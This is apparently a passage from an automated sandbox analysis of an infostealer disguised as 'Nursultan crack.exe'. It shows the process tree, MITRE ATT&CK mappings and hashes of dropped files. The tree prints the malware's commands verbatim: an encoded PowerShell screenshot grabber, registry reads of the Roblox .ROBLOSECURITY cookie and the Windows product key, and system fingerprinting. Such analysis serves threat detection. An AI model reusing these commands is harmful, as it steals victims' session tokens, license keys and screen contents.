        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1908
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gz5frbmg\gz5frbmg.cmdline"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1952
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFAAC.tmp" "c:\Users\Admin\AppData\Local\Temp\gz5frbmg\CSC57D25859A1C94340AD3F6C80437D4CC0.TMP"
        8⤵
        
        PID:4160
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2916
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:4976
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3476
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:2060
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4432
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5064
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4360
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:1552
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3708
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:4812
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:1200
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1264
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:2252
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2772
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        5⤵
        
        PID:2468
      - C:\Windows\system32\getmac.exe
        
        getmac
        6⤵
        
        PID:3176
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        5⤵
        
        PID:1824
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1368
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        5⤵
        
        PID:2860
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:412
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:3424
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2616
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3468
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        5⤵
        
        PID:2480
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2088
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:3500
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        Suspicious behavior: EnumeratesProcesses
        
        PID:4416
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        5⤵
        
        PID:3056
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:884

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:1204

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe

Filesize
19.2MB

MD5
917f67250baa4a1df4b4681c08e4076e

SHA1
6b7d22fc2e8f6a479e546b62a557e65c698a71e9

SHA256
f943a2a7ac5080fadf3b7242fb1a99c5d5bf8feae9c8f6731262cc9c084387a5

SHA512
6f995e81c7d5582fb01c5978466d57aa7bf8ff26877f1291c17eb10d752954d7bcb53b07ef4801288e3a72918f5186e9684aa1caf441dc314e5a6cec462cb441

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\VCRUNTIME140_1.dll

Filesize
48KB

MD5
68156f41ae9a04d89bb6625a5cd222d4

SHA1
3be29d5c53808186eba3a024be377ee6f267c983

SHA256
82a2f9ae1e6146ae3cb0f4bc5a62b7227e0384209d9b1aef86bbcc105912f7cd

SHA512
f7bf8ad7cd8b450050310952c56f6a20b378a972c822ccc253ef3d7381b56ffb3ca6ce3323bea9872674ed1c02017f78ab31e9eb9927fc6b3cba957c247e5d57

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ctypes.pyd

Filesize
122KB

MD5
302ddf5f83b5887ab9c4b8cc4e40b7a6

SHA1
0aa06af65d072eb835c8d714d0f0733dc2f47e20

SHA256
8250b4c102abd1dba49fc5b52030caa93ca34e00b86cee6547cc0a7f22326807

SHA512
5ddc2488fa192d8b662771c698a63faaf109862c8a4dd0df10fb113aef839d012df58346a87178aff9a1b369f82d8ae7819cef4aad542d8bd3f91327feace596

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_hashlib.pyd

Filesize
64KB

MD5
0abfee1db6c16e8ddaff12cd3e86475b

SHA1
b2dda9635ede4f2841912cc50cb3ae67eea89fe7

SHA256
b4cec162b985d34ab768f66e8fa41ed28dc2f273fde6670eeace1d695789b137

SHA512
0a5cae4e3442af1d62b65e8bf91e0f2a61563c2b971bbf008bfb2de0f038ee472e7bfcc88663dc503b2712e92e6a7e6a5f518ddab1fab2eb435d387b740d2d44

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_lzma.pyd

Filesize
154KB

MD5
e3e7e99b3c2ea56065740b69f1a0bc12

SHA1
79fa083d6e75a18e8b1e81f612acb92d35bb2aea

SHA256
b095fa2eac97496b515031fbea5737988b18deee86a11f2784f5a551732ddc0c

SHA512
35cbc30b1ccdc4f5cc9560fc0149373ccd9399eb9297e61d52e6662bb8c56c6a7569d8cfad85aeb057c10558c9352ae086c0467f684fdcf72a137eadf563a909

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\certifi\cacert.pem

Filesize
292KB

MD5
50ea156b773e8803f6c1fe712f746cba

SHA1
2c68212e96605210eddf740291862bdf59398aef

SHA256
94edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47

SHA512
01ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libcrypto-3.dll

Filesize
5.0MB

MD5
123ad0908c76ccba4789c084f7a6b8d0

SHA1
86de58289c8200ed8c1fc51d5f00e38e32c1aad5

SHA256
4e5d5d20d6d31e72ab341c81e97b89e514326c4c861b48638243bdf0918cfa43

SHA512
80fae0533ba9a2f5fa7806e86f0db8b6aab32620dde33b70a3596938b529f3822856de75bddb1b06721f8556ec139d784bc0bb9c8da0d391df2c20a80d33cb04

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libssl-3.dll

Filesize
774KB

MD5
4ff168aaa6a1d68e7957175c8513f3a2

SHA1
782f886709febc8c7cebcec4d92c66c4d5dbcf57

SHA256
2e4d35b681a172d3298caf7dc670451be7a8ba27c26446efc67470742497a950

SHA512
c372b759b8c7817f2cbb78eccc5a42fa80bdd8d549965bd925a97c3eebdce0335fbfec3995430064dead0f4db68ebb0134eb686a0be195630c49f84b468113e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\unicodedata.pyd

Filesize
1.1MB

MD5
098cc6ad04199442c3e2a60e1243c2dc

SHA1
4c92c464a8e1e56e1c4d77cd30a0da474a026aaf

SHA256
64a162d6b11ba10cb11509f3cc445f17beb7acfd064f030b4d59faa1c9894b29

SHA512
73c28488b42a0bc2f0d2861fed3f5dcccf8959ce19d3121c13c998db496f2822deb40f36f86240c8d3954fd2dc2ba5d63c8a125b62324dcd92fb6c8ba49ff170

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~2\sqlite3.dll

Filesize
1.5MB

MD5
8c5644cb9cef2bb0702a4c8007521c98

SHA1
638af7d40162853d1be85c04125dbf18743bfa1b

SHA256
2f9c9940e87840ff1b5c4922d8b73c7302d1b12badc860990dfebdf77b4140ee

SHA512
1f0a6e969bcb37bcd131b1476f21a068f69b9224063e194b3a04a9454e50dd530d3474e82b24a9be727b94272fadfeaea76a896cd0fb579e15fdf7a48b00cc01

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hbkmtf2n.qlp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_1516_133779329264371345\0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe

Filesize
12.0MB

MD5
a731fcf1df3175ffd6c6af49c8524bf0

SHA1
50479172ef56ae1f991cc0117f9b5a8ba139145a

SHA256
21a38ed6992069b237c541d74890f6d2128647a21cbb3da803e271463c17dff4

SHA512
3dad4520046fc9f57cbfffabb01df9b99abb61a082affe6ec39f3287c2db23219be35967ecb8b85fd3ff4f7bbaf495d0078666c9f70ff53fb4c4fbaad31aced5

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_1516_133779329264371345\_sqlite3.pyd

Filesize
122KB

MD5
d3d748770f9bbcf22f20322250befd5b

SHA1
0b5ced1de5f6585cfd3edd9d00f75e56d2c0959d

SHA256
fef8e9f427b47e7758658a876ff1f2d718119af54dbb0498e14c8234571942df

SHA512
c8027eb9a71c5aaf9d714bfebebad091ed45952ca2867981fd1a4e1fdb9fa409addfbcb1d2dc01732a2216b257300d6a88aaea0742b6e1b1d1abbac5506feabc

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_3920_133779329186348244\Nursultan crack.exe

Filesize
16.8MB

MD5
5aeb10ef9e200bdbe097d8710d815e3d

SHA1
1caec49b55555a038ba53e6eb0421581405e43de

SHA256
1f5bf8b31d1eef930f8c529dd05c81068c8f7aafc55131d7dc5939bf13cede8c

SHA512
76b459b32f4291445511333d975fc14f4ad9224bcfa3813e2f351d0235590239108c94d646f411756494415f17df7fbf414230645bc64aabc9e7c66c7b77e748

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_3920_133779329186348244\VCRUNTIME140.dll

Filesize
117KB

MD5
862f820c3251e4ca6fc0ac00e4092239

SHA1
ef96d84b253041b090c243594f90938e9a487a9a

SHA256
36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

SHA512
2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_3920_133779329186348244\_bz2.pyd

Filesize
82KB

MD5
fe499b0a9f7f361fa705e7c81e1011fa

SHA1
cc1c98754c6dab53f5831b05b4df6635ad3f856d

SHA256
160b5218c2035cccbaab9dc4ca26d099f433dcb86dbbd96425c933dc796090df

SHA512
60520c5eb5ccc72ae2a4c0f06c8447d9e9922c5f9f1f195757362fc47651adcc1cdbfef193ae4fec7d7c1a47cf1d9756bd820be996ae145f0fbbbfba327c5742

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_3920_133779329186348244\_queue.pyd

Filesize
31KB

MD5
941a3757931719dd40898d88d04690cb

SHA1
177ede06a3669389512bfc8a9b282d918257bf8b

SHA256
bbe7736caed8c17c97e2b156f686521a788c25f2004aae34ab0c282c24d57da7

SHA512
7cfba5c69695c492bf967018b3827073b0c2797b24e1bd43b814fbbb39d1a8b32a2d7ef240e86046e4e07aa06f7266a31b5512d04d98a0d2d3736630c044546e

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_3920_133779329186348244\_socket.pyd

Filesize
81KB

MD5
632336eeead53cfad22eb57f795d5657

SHA1
62f5f73d21b86cd3b73b68e5faec032618196745

SHA256
ce3090fff8575b21287df5fc69ae98806646fc302eefadf85e369ad3debad92b

SHA512
77965b45060545e210cdb044f25e5fd68d6a9150caf1cad7645dbafcf1ce8e1ccbdf8436fbdcbf5f9c293321c8916e114de30ed8897c7db72df7f8d1f98dfb55

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_3920_133779329186348244\_ssl.pyd

Filesize
173KB

MD5
eea3e12970e28545a964a95da7e84e0b

SHA1
c3ccac86975f2704dabc1ffc3918e81feb3b9ac1

SHA256
61f00b0543464bba61e0bd1128118326c9bd0cdc592854dd1a31c3d6d8df2b83

SHA512
9bd5c83e7e0ab24d6be40a31ac469a0d9b4621a2a279a5f3ab2fc6401a08c54aec421bc9461aed533a0211d7dbda0c264c5f05aeb39138403da25c8cda0339e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_3920_133779329186348244\_wmi.pyd

Filesize
37KB

MD5
fda7d7aada1d15cab2add2f4bd2e59a1

SHA1
7e61473f2ad5e061ef59105bf4255dbe7db5117a

SHA256
b0ed1c62b73b291a1b57e3d8882cc269b2fcbb1253f2947da18d9036e0c985d9

SHA512
95c2934a75507ea2d8c817da7e76ee7567ec29a52018aef195fac779b7ffb440c27722d162f8e416b6ef5d3fd0936c71a55776233293b3dd0124d51118a2b628

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_3920_133779329186348244\charset_normalizer\md.pyd

Filesize
10KB

MD5
71d96f1dbfcd6f767d81f8254e572751

SHA1
e70b74430500ed5117547e0cd339d6e6f4613503

SHA256
611e1b4b9ed6788640f550771744d83e404432830bb8e3063f0b8ec3b98911af

SHA512
7b10e13b3723db0e826b7c7a52090de999626d5fa6c8f9b4630fdeef515a58c40660fa90589532a6d4377f003b3cb5b9851e276a0b3c83b9709e28e6a66a1d32

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_3920_133779329186348244\charset_normalizer\md__mypyc.pyd

Filesize
122KB

MD5
d8f690eae02332a6898e9c8b983c56dd

SHA1
112c1fe25e0d948f767e02f291801c0e4ae592f0

SHA256
c6bb8cad80b8d7847c52931f11d73ba64f78615218398b2c058f9b218ff21ca9

SHA512
e732f79f39ba9721cc59dbe8c4785ffd74df84ca00d13d72afa3f96b97b8c7adf4ea9344d79ee2a1c77d58ef28d3ddcc855f3cb13edda928c17b1158abcc5b4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_3920_133779329186348244\libffi-8.dll

Filesize
38KB

MD5
0f8e4992ca92baaf54cc0b43aaccce21

SHA1
c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

SHA256
eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

SHA512
6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_3920_133779329186348244\psutil\_psutil_windows.pyd

Filesize
65KB

MD5
49ac12a1f10ab93fafab064fd0523a63

SHA1
3ad6923ab0fb5d3dd9d22ed077db15b42c2fbd4f

SHA256
ba033b79e858dbfcba6bf8fb5afe10defd1cb03957dbbc68e8e62e4de6df492d

SHA512
1bc0f50e0bb0a9d9dddad31390e5c73b0d11c2b0a8c5462065d477e93ff21f7edc7aa2b2b36e478be0a797a38f43e3fbeb6aaabef0badec1d8d16eb73df67255

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_3920_133779329186348244\python3.dll

Filesize
66KB

MD5
2e2bb725b92a3d30b1e42cc43275bb7b

SHA1
83af34fb6bbb3e24ff309e3ebc637dd3875592a5

SHA256
d52baca085f88b40f30c855e6c55791e5375c80f60f94057061e77e33f4cad7a

SHA512
e4a500287f7888b1935df40fd0d0f303b82cbcf0d5621592805f3bb507e8ee8de6b51ba2612500838d653566fad18a04f76322c3ab405ce2fdbbefb5ab89069e

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_3920_133779329186348244\python312.dll

Filesize
6.6MB

MD5
b243d61f4248909bc721674d70a633de

SHA1
1d2fb44b29c4ac3cfd5a7437038a0c541fce82fc

SHA256
93488fa7e631cc0a2bd808b9eee8617280ee9b6ff499ab424a1a1cbf24d77dc7

SHA512
10460c443c7b9a6d7e39ad6e2421b8ca4d8329f1c4a0ff5b71ce73352d2e9438d45f7d59edb13ce30fad3b4f260bd843f4d9b48522d448310d43e0988e075fcb

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_3920_133779329186348244\select.pyd

Filesize
30KB

MD5
7e871444ca23860a25b888ee263e2eaf

SHA1
aa43c9d3abdb1aabda8379f301f8116d0674b590

SHA256
dca5e6d39c5094ce599143cb82f6d8470f0c2a4ce4443499e73f32ed13333fd0

SHA512
2e260d3123f7ca612901513b90fe40739e85248da913297d4cca3b2ebd398d9697880d148830e168e474ebfc3d30ede10668c7316ed7668f8b39da7bca59e57d

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_3920_133779329186348244\zstandard\backend_c.pyd

Filesize
508KB

MD5
0fc69d380fadbd787403e03a1539a24a

SHA1
77f067f6d50f1ec97dfed6fae31a9b801632ef17

SHA256
641e0b0fa75764812fff544c174f7c4838b57f6272eaae246eb7c483a0a35afc

SHA512
e63e200baf817717bdcde53ad664296a448123ffd055d477050b8c7efcab8e4403d525ea3c8181a609c00313f7b390edbb754f0a9278232ade7cfb685270aaf0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Desktop\AddClear.mp3

Filesize
811KB

MD5
6e73d9e67704e6e60dd832fc9e28342b

SHA1
1e2c69aadd423e28815a84c183551efca0a21e04

SHA256
ffff0842babfa838a85efeb95128c7ee03869ded425fde22e99598db2e9d980a

SHA512
44943e3809c15f58a4337cd464ff51a4aa12d062c220276197436454c85cd88b0117fe601be60e3a0783e339061b92a089ff6b1232abc45cc3ad2d596296f214

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Desktop\BlockProtect.jpeg

Filesize
705KB

MD5
8225ff53a8db96c2b37b35f61b806d39

SHA1
4fe2f43d3872422434214436bc358a5eea66f2f7

SHA256
69dc7854f1f996a24dfc5a10174166fb7483d4790b1e60320b307c48f4bc98ba

SHA512
0a31dafed2bc396d9292f874ce3387bad0c21ee68b05f0b0724c591dbb11157b94942b4ce1adf9e14986788fc246cd9492e229c31823d080749b94e7a19f3271

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Desktop\ClearSelect.xlsx

Filesize
9KB

MD5
51e53f83be8bcecc81bad916499fa591

SHA1
212b33496fa4b473d085b66f65898fe0ccb261e7

SHA256
11d802cdae8d6b9d68086eb7acf0fc2b45907116dca1eb277e1c2be40ee93462

SHA512
3768e53fa46fe4ba5169049f670bd1fef77620625786db7268a612c1b17d079eb9dd2a749cd45a3465e3ed245c10e4be4ea784df79540bf6fb88b54eebab8bd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Desktop\CompareInvoke.csv

Filesize
284KB

MD5
c6b050bee0e8d4e2a090b2fc560ffd4c

SHA1
e8760e426d3ff91ce18b83247549cacf91e0c57d

SHA256
803f93614e60d871b3f95cf488974b09c85ecfff6d404ac1f80d1b06bb3d797e

SHA512
